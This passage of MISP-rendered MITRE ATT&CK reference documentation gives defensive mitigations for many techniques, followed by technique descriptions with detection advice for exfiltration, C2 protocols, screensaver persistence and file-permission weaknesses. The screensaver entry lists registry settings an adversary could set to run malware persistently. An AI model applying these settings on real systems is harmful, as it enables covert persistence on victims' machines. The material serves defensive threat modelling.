</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to leverage SMB and the Windows admin shares, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_space_after_filename_mitigation"><a class="anchor" href="#_space_after_filename_mitigation"></a><a class="link" href="#_space_after_filename_mitigation">Space after Filename Mitigation</a></h3>
<div class="paragraph">
<p>Prevent files from having a trailing space after the extension.</p>
</div>
</div>
<div class="sect2">
<h3 id="_modify_existing_service_mitigation"><a class="anchor" href="#_modify_existing_service_mitigation"></a><a class="link" href="#_modify_existing_service_mitigation">Modify Existing Service Mitigation</a></h3>
<div class="paragraph">
<p>Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations. Toolkits like the PowerSploit framework contain the PowerUp modules that can be used to explore systems for [[Privilege Escalation]] weaknesses.<a id="CiteRef::Powersploit"></a></p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through service abuse by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown programs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_third_party_software_mitigation"><a class="anchor" href="#_third_party_software_mitigation"></a><a class="link" href="#_third_party_software_mitigation">Third-party Software Mitigation</a></h3>
<div class="paragraph">
<p>Evaluate the security of third-party software that could be used to deploy or execute programs. Ensure that access to management systems for deployment systems is limited, monitored, and secure. Have a strict approval policy for use of deployment systems.</p>
</div>
<div class="paragraph">
<p>Grant access to application deployment systems only to a limited number of authorized administrators. Ensure proper system and access isolation for critical network systems through use of firewalls, account privilege separation, group policy, and multifactor authentication. Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network. Patch deployment systems regularly to prevent potential remote access through [[Technique/T1068|Exploitation of Vulnerability]].</p>
</div>
<div class="paragraph">
<p>If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.</p>
</div>
</div>
<div class="sect2">
<h3 id="_video_capture_mitigation"><a class="anchor" href="#_video_capture_mitigation"></a><a class="link" href="#_video_capture_mitigation">Video Capture Mitigation</a></h3>
<div class="paragraph">
<p>Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be used to capture video and images by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_install_root_certificate_mitigation"><a class="anchor" href="#_install_root_certificate_mitigation"></a><a class="link" href="#_install_root_certificate_mitigation">Install Root Certificate Mitigation</a></h3>
<div class="paragraph">
<p>HTTP Public Key Pinning (HPKP) is one method to mitigate potential man-in-the-middle situations where and adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate.[[CiteRef::Wikipedia HPKP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_brute_force_mitigation"><a class="anchor" href="#_brute_force_mitigation"></a><a class="link" href="#_brute_force_mitigation">Brute Force Mitigation</a></h3>
<div class="paragraph">
<p>Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Use multifactor authentication. Follow best practices for mitigating access to [[Technique/T1078|Valid Accounts]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_email_collection_mitigation"><a class="anchor" href="#_email_collection_mitigation"></a><a class="link" href="#_email_collection_mitigation">Email Collection Mitigation</a></h3>
<div class="paragraph">
<p>Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.</p>
</div>
<div class="paragraph">
<p>Use of two-factor authentication for public-facing webmail servers is also a recommended best practice to minimize the usefulness of user names and passwords to adversaries.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to collect email data files or access the corporate email server, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_exploitation_of_vulnerability_mitigation"><a class="anchor" href="#_exploitation_of_vulnerability_mitigation"></a><a class="link" href="#_exploitation_of_vulnerability_mitigation">Exploitation of Vulnerability Mitigation</a></h3>
<div class="paragraph">
<p>Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, virtualization, and exploit prevention tools such as the Microsoft Enhanced Mitigation Experience Toolkit.[[CiteRef::SRD EMET]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_remote_file_copy_mitigation"><a class="anchor" href="#_remote_file_copy_mitigation"></a><a class="link" href="#_remote_file_copy_mitigation">Remote File Copy Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_alternative_protocol_mitigation"><a class="anchor" href="#_exfiltration_over_alternative_protocol_mitigation"></a><a class="link" href="#_exfiltration_over_alternative_protocol_mitigation">Exfiltration Over Alternative Protocol Mitigation</a></h3>
<div class="paragraph">
<p>Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network. For example, if services like FTP are not required for sending information outside of a network, then block FTP-related ports at the network perimeter. Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network.[[CiteRef::TechNet Firewall Design]] These actions will help reduce command and control and exfiltration path opportunities.</p>
</div>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_remote_desktop_protocol_mitigation"><a class="anchor" href="#_remote_desktop_protocol_mitigation"></a><a class="link" href="#_remote_desktop_protocol_mitigation">Remote Desktop Protocol Mitigation</a></h3>
<div class="paragraph">
<p>Disable the RDP service if it is unnecessary, remove unnecessary accounts and groups from Remote Desktop Users groups, and enable firewall rules to block RDP traffic between network security zones. Audit the Remote Desktop Users group membership regularly. Remove the local Administrators group from the list of groups allowed to log in through RDP. Limit remote user permissions if remote access is necessary. Use remote desktop gateways and multifactor authentication for remote logins.[[CiteRef::Berkley Secure]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_web_service_mitigation"><a class="anchor" href="#_web_service_mitigation"></a><a class="link" href="#_web_service_mitigation">Web Service Mitigation</a></h3>
<div class="paragraph">
<p>Firewalls and Web proxies can be used to enforce external network communication policy. It may be difficult for an organization to block particular services because so many of them are commonly used during the course of business.</p>
</div>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol or encoded commands used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_network_service_scanning_mitigation"><a class="anchor" href="#_network_service_scanning_mitigation"></a><a class="link" href="#_network_service_scanning_mitigation">Network Service Scanning Mitigation</a></h3>
<div class="paragraph">
<p>Use network intrusion detection/prevention systems to detect and prevent remote service scans. Ensure that unnecessary ports and services are closed and proper network segmentation is followed to protect critical servers and devices.</p>
</div>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services running on remote systems, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_keychain_mitigation"><a class="anchor" href="#_keychain_mitigation"></a><a class="link" href="#_keychain_mitigation">Keychain Mitigation</a></h3>
<div class="paragraph">
<p>The password for the user&#8217;s login keychain can be changed from the user&#8217;s login password. This increases the complexity for an adversary because they need to know an additional password.</p>
</div>
</div>
<div class="sect2">
<h3 id="_windows_management_instrumentation_event_subscription_mitigation"><a class="anchor" href="#_windows_management_instrumentation_event_subscription_mitigation"></a><a class="link" href="#_windows_management_instrumentation_event_subscription_mitigation">Windows Management Instrumentation Event Subscription Mitigation</a></h3>
<div class="paragraph">
<p>Disabling WMI services may cause system instability and should be evaluated to assess the impact to a network. By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI. Prevent credential overlap across systems of administrator and privileged accounts.[[CiteRef::FireEye WMI 2015]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_from_local_system_mitigation"><a class="anchor" href="#_data_from_local_system_mitigation"></a><a class="link" href="#_data_from_local_system_mitigation">Data from Local System Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to collect data from the local system, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_custom_cryptographic_protocol_mitigation"><a class="anchor" href="#_custom_cryptographic_protocol_mitigation"></a><a class="link" href="#_custom_cryptographic_protocol_mitigation">Custom Cryptographic Protocol Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Since the custom protocol used may not adhere to typical protocol standards, there may be opportunities to signature the traffic on a network level for detection. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_create_account_mitigation"><a class="anchor" href="#_create_account_mitigation"></a><a class="link" href="#_create_account_mitigation">Create Account Mitigation</a></h3>
<div class="paragraph">
<p>Use and enforce multifactor authentication. Follow guidelines to prevent or limit adversary access to [[Technique/T1078|Valid Accounts]] that may be used to create privileged accounts within an environment.</p>
</div>
<div class="paragraph">
<p>Adversaries that create local accounts on systems may have limited access within a network if access levels are properly locked down. These accounts may only be needed for persistence on individual systems and their usefulness depends on the utility of the system they reside on.</p>
</div>
<div class="paragraph">
<p>Protect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</p>
</div>
</div>
<div class="sect2">
<h3 id="_dylib_hijacking_mitigation"><a class="anchor" href="#_dylib_hijacking_mitigation"></a><a class="link" href="#_dylib_hijacking_mitigation">Dylib Hijacking Mitigation</a></h3>
<div class="paragraph">
<p>Prevent users from being able to write files to the search paths for applications - both in the folders where applications are run from and the standard dylib folders. If users can&#8217;t write to these directories, then they can&#8217;t intercept the search path.</p>
</div>
</div>
<div class="sect2">
<h3 id="_credentials_in_files_mitigation"><a class="anchor" href="#_credentials_in_files_mitigation"></a><a class="link" href="#_credentials_in_files_mitigation">Credentials in Files Mitigation</a></h3>
<div class="paragraph">
<p>Establish an organizational policy that prohibits password storage in files. Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers. Preemptively search for files containing passwords and remove when found. Restrict file shares to specific directories with access only to necessary users. Remove vulnerable Group Policy Preferences.[[CiteRef::Microsoft MS14-025]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_re_opened_applications_mitigation"><a class="anchor" href="#_re_opened_applications_mitigation"></a><a class="link" href="#_re_opened_applications_mitigation">Re-opened Applications Mitigation</a></h3>
<div class="paragraph">
<p>Holding the Shift key while logging in prevents apps from opening automatically[[CiteRef::Re-Open windows on Mac]]. This feature can be disabled entirely with the following terminal command: &lt;code&gt;defaults write -g ApplePersistence -bool no&lt;/code&gt;.</p>
</div>
</div>
<div class="sect2">
<h3 id="_permission_groups_discovery_mitigation"><a class="anchor" href="#_permission_groups_discovery_mitigation"></a><a class="link" href="#_permission_groups_discovery_mitigation">Permission Groups Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about groups and permissions, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_logon_scripts_mitigation"><a class="anchor" href="#_logon_scripts_mitigation"></a><a class="link" href="#_logon_scripts_mitigation">Logon Scripts Mitigation</a></h3>
<div class="paragraph">
<p>Restrict write access to logon scripts to specific administrators. Prevent access to administrator accounts by mitigating [[Credential Access]] techniques and limiting account access and permissions of [[Technique/T1078|Valid Accounts]].</p>
</div>
<div class="paragraph">
<p>Identify and block potentially malicious software that may be executed through logon script modification by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown programs.</p>
</div>
</div>
<div class="sect2">
<h3 id="_code_signing_mitigation"><a class="anchor" href="#_code_signing_mitigation"></a><a class="link" href="#_code_signing_mitigation">Code Signing Mitigation</a></h3>
<div class="paragraph">
<p>Process whitelisting and trusted publishers to verify authenticity of software can help prevent signed malicious or untrusted code from executing on a system.[[CiteRef::NSA MS AppLocker]][[CiteRef::TechNet Trusted Publishers]][[CiteRef::Securelist Digital Certificates]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_gatekeeper_bypass_mitigation"><a class="anchor" href="#_gatekeeper_bypass_mitigation"></a><a class="link" href="#_gatekeeper_bypass_mitigation">Gatekeeper Bypass Mitigation</a></h3>
<div class="paragraph">
<p>Other tools should be used to supplement Gatekeeper&#8217;s functionality. Additionally, system settings can prevent applications from running that haven&#8217;t been downloaded through the Apple Store which can help mitigate some of these issues.</p>
</div>
</div>
<div class="sect2">
<h3 id="_windows_remote_management_mitigation"><a class="anchor" href="#_windows_remote_management_mitigation"></a><a class="link" href="#_windows_remote_management_mitigation">Windows Remote Management Mitigation</a></h3>
<div class="paragraph">
<p>Disable the WinRM service. If the service is necessary, lock down critical enclaves with separate WinRM infrastructure, accounts, and permissions. Follow WinRM best practices on configuration of authentication methods and use of host firewalls to restrict WinRM access to allow communication only to/from specific devices.[[CiteRef::NSA Spotting]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_web_shell_mitigation"><a class="anchor" href="#_web_shell_mitigation"></a><a class="link" href="#_web_shell_mitigation">Web Shell Mitigation</a></h3>
<div class="paragraph">
<p>Ensure that externally facing Web servers are patched regularly to prevent adversary access through [[Technique/T1068|Exploitation of Vulnerability]] to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages.</p>
</div>
<div class="paragraph">
<p>Audit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through [[Credential Access]] and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network.[[CiteRef::US-CERT Alert TA15-314A Web Shells]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_data_obfuscation_mitigation"><a class="anchor" href="#_data_obfuscation_mitigation"></a><a class="link" href="#_data_obfuscation_mitigation">Data Obfuscation Mitigation</a></h3>
<div class="paragraph">
<p>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_software_packing_mitigation"><a class="anchor" href="#_software_packing_mitigation"></a><a class="link" href="#_software_packing_mitigation">Software Packing Mitigation</a></h3>
<div class="paragraph">
<p>Ensure updated virus definitions. Create custom signatures for observed malware. Employ heuristic-based malware detection.</p>
</div>
<div class="paragraph">
<p>Identify and prevent execution of potentially malicious software that may have been packed by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
<div class="sect2">
<h3 id="_security_software_discovery_mitigation"><a class="anchor" href="#_security_software_discovery_mitigation"></a><a class="link" href="#_security_software_discovery_mitigation">Security Software Discovery Mitigation</a></h3>
<div class="paragraph">
<p>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about local security software, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</p>
</div>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_enterprise_attack_attack_pattern"><a class="anchor" href="#_enterprise_attack_attack_pattern"></a><a class="link" href="#_enterprise_attack_attack_pattern">Enterprise Attack - Attack Pattern</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>ATT&amp;CK tactic.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Enterprise Attack - Attack Pattern is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/enterprise" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/enterprise</a> attack - attack pattern.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_alternative_protocol_t1048"><a class="anchor" href="#_exfiltration_over_alternative_protocol_t1048"></a><a class="link" href="#_exfiltration_over_alternative_protocol_t1048">Exfiltration Over Alternative Protocol - T1048</a></h3>
<div class="paragraph">
<p>Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: User interface, Process monitoring, Process use of network, Packet capture, Netflow/Enclave netflow, Network protocol analysis</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 722. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1048">https://attack.mitre.org/wiki/Technique/T1048</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_standard_application_layer_protocol_t1071"><a class="anchor" href="#_standard_application_layer_protocol_t1071"></a><a class="link" href="#_standard_application_layer_protocol_t1071">Standard Application Layer Protocol - T1071</a></h3>
<div class="paragraph">
<p>Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.</p>
</div>
<div class="paragraph">
<p>For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 723. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1071">https://attack.mitre.org/wiki/Technique/T1071</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_communication_through_removable_media_t1092"><a class="anchor" href="#_communication_through_removable_media_t1092"></a><a class="link" href="#_communication_through_removable_media_t1092">Communication Through Removable Media - T1092</a></h3>
<div class="paragraph">
<p>Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor file access on removable media. Detect processes that execute when removable media is mounted.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Data loss prevention</p>
</div>
<div class="paragraph">
<p>Requires Network: No</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 724. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1092">https://attack.mitre.org/wiki/Technique/T1092</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_screensaver_t1180"><a class="anchor" href="#_screensaver_t1180"></a><a class="link" href="#_screensaver_t1180">Screensaver - T1180</a></h3>
<div class="paragraph">
<p>Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. (Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.exe is located in &lt;code&gt;C:\Windows\System32\&lt;/code&gt; along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (&lt;code&gt;HKCU\Control Panel\Desktop\&lt;/code&gt;) and could be manipulated to achieve persistence:</p>
</div>
<div class="paragraph">
<p>*&lt;code&gt;SCRNSAVE.exe&lt;/code&gt; - set to malicious PE path
*&lt;code&gt;ScreenSaveActive&lt;/code&gt; - set to '1' to enable the screensaver
*&lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; - set to '0' to not require a password to unlock
*&lt;code&gt;ScreenSaverTimeout&lt;/code&gt; - sets user inactivity timeout before screensaver is executed</p>
</div>
<div class="paragraph">
<p>Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.</p>
</div>
<div class="paragraph">
<p>Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, Process command-line parameters, Windows Registry, File monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: Bartosz Jerzman</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 725. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1180">https://attack.mitre.org/wiki/Technique/T1180</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Screensaver">https://en.wikipedia.org/wiki/Screensaver</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf">https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_custom_command_and_control_protocol_t1094"><a class="anchor" href="#_custom_command_and_control_protocol_t1094"></a><a class="link" href="#_custom_command_and_control_protocol_t1094">Custom Command and Control Protocol - T1094</a></h3>
<div class="paragraph">
<p>Adversaries may communicate using a custom command and control protocol instead of using existing Standard Application Layer Protocol to encapsulate commands. Implementations could mimic well-known protocols.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 726. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1094">https://attack.mitre.org/wiki/Technique/T1094</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_file_system_permissions_weakness_t1044"><a class="anchor" href="#_file_system_permissions_weakness_t1044"></a><a class="link" href="#_file_system_permissions_weakness_t1044">File System Permissions Weakness - T1044</a></h3>
<div class="paragraph">
<p>Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.</p>
</div>
<div class="paragraph">
<p>Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</p>
</div>
<div class="paragraph">
<p>===Services===</p>
</div>
<div class="paragraph">
